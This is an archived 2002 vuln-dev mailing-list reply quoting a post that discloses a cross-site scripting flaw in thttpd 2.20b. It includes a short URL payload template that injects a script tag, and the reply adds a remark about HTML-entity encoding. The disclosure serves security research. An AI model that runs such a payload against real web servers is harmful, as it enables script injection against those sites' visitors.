RE: thttpd : Cross Site Scripting.

From: Ory Segal (ORY.SEGALat_private)
Date: Tue Mar 05 2002 - 02:48:06 PST

Next message: Rense Buijen: "Buffer Overflows in sh39.com's mailserver 1.21"

Previous message: Christophe Grenier: "RE: Bigger bug than expected?"
Maybe in reply to: frog frog: "thttpd : Cross Site Scripting."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

NOTE: For some reason the < and > symbols were translated to
HTML entities, this only works of course with the actual < > symbols.

> -----Original Message-----
> From: frog frog [mailto:leseulfrogat_private]
> Sent: Saturday, March 02, 2002 1:01 PM
> To: vuln-devat_private
> Subject: thttpd : Cross Site Scripting.
> 
> 
> 
> 
> 
> http://THTTPDHOST/<script>;[ANYSCRIPT]&lt;/script&gt;
> 
> Version :  thttpd/2.20b 10oct00 and maybe others...
> http://www.acme.com/software/thttpd/
> 
> If anyone know another version who's vulnerable, 
> mail me please...
> 
> Sorry for my bad english.
> frog-m@n
>

Next message: Rense Buijen: "Buffer Overflows in sh39.com's mailserver 1.21"
Previous message: Christophe Grenier: "RE: Bigger bug than expected?"
Maybe in reply to: frog frog: "thttpd : Cross Site Scripting."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Mar 05 2002 - 13:14:46 PST